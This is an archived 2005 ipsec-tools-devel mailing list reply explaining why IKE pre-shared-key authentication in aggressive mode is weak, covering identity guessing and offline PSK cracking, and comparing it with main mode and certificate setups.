Re: [Ipsec-tools-devel] does the racoon match the draft"IKEv2"?
Brought to you by:
mit_warlord,
netbsd
From: VANHULLEBUS Y. <va...@fr...> - 2005-09-02 15:58:44
|
On Fri, Sep 02, 2005 at 09:55:08AM -0400, uri...@op... wrote: > > > > Some IKE configuration are known to be poor on security. This > > > > is a protocol problem, not an implementation problem. Generally > > > > speaking, PSK is bad. > > > > PSK with aggressive mode is even worse. > > > > Is there any other security problem? I want to know it! I'm not > > sure where can find the discussion about the topic. > > Can Yvan please elaborate? For to the best of my knowledge, PSK is > quite OK, especially from the protocol point of view, and the only > issue with Aggressive mode is that it does not hide identities of > the peers. PSK / Aggressive mode is quite weak. It has been discussed here, the problems are: - Guessing valid identities, because the responder will only reply if initiator sends a valid ID. This can be solved by some mechanism which would detect too many attempts from the same peer and blacklist it, but it could lead to some easy DoS ! - Cracking a PSK, because in aggressive mode the responder will be the first to send cryptographic payloads. See http://ikecrack.sourceforge.net/ for more informations. This is a flaw in the protocol, and cannot be fixed afaik. I didn't have time for now to test that tool and check how much time it needs to crack a PSK. Those two problems are really specific to PSK / Aggressive mode, I don't know any problems with Certificates / Aggressive mode or PSK / Main mode, and I don't think such problems could exist with those configurations. > Also, a few points. Since when is repudiation a concern when you're > trying to establish a secure pipe between two peers? How often do > you think PSK should be regenerated, considering that it is ONLY > used to authenticate the SA establishment exchanges? It depends on lots of things: - Size and complexity of the PSK - phase1 lifetime (in fact, number of phases1 which can be sniffed during some amount of time). - DH group and encryption algorithms used. All those parameters will determine how much time will be needed to do some offline brute force attack / statistical cryptanalysis. I don't think such bruteforce attack can be done with MAIN mode, as HASH_I and HASH_R are crypted (5th and 6th exchanges of the phase1). Bruteforcing MAIN mode would need "some kind of DH bruteforce" (well, I'm not a DH expert, I'm still not sure this means something, but if this means something, I'm quite sure this can't be done in a "reasonnable amount of time"). Yvan. -- NETASQ - Secure Internet Connectivity http://www.netasq.com |